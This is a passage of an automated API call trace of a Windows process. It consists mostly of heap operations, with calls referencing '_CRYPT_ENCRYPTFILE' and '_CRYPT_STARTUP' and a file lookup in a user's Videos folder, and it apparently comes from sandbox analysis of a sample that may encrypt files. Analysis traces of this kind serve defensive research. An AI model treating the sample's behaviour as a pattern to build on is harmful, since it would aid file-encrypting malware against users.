hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.195] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0103.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0103.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0103.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca6e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.196] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0103.196] CloseHandle (hObject=0x258) returned 1 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0103.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0103.197] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0103.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.198] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0103.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0103.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0103.199] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0103.199] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0103.199] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0103.199] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a75c0 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28f0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0103.200] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0103.200] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0103.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0103.201] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0103.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0103.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0103.201] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0103.201] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.202] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0103.202] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0103.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.203] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.204] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\333uErW2SJ.avi", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x981f43e0, ftCreationTime.dwHighDateTime=0x1d5ee5e, ftLastAccessTime.dwLowDateTime=0xf6d94300, ftLastAccessTime.dwHighDateTime=0x1d5ed5e, ftLastWriteTime.dwLowDateTime=0xf6d94300, ftLastWriteTime.dwHighDateTime=0x1d5ed5e, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="333uErW2SJ.avi", cAlternateFileName="333UER~1.AVI")) returned 0x41ac780 [0103.204] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0103.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.205] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0103.205] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0103.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca838 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.205] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 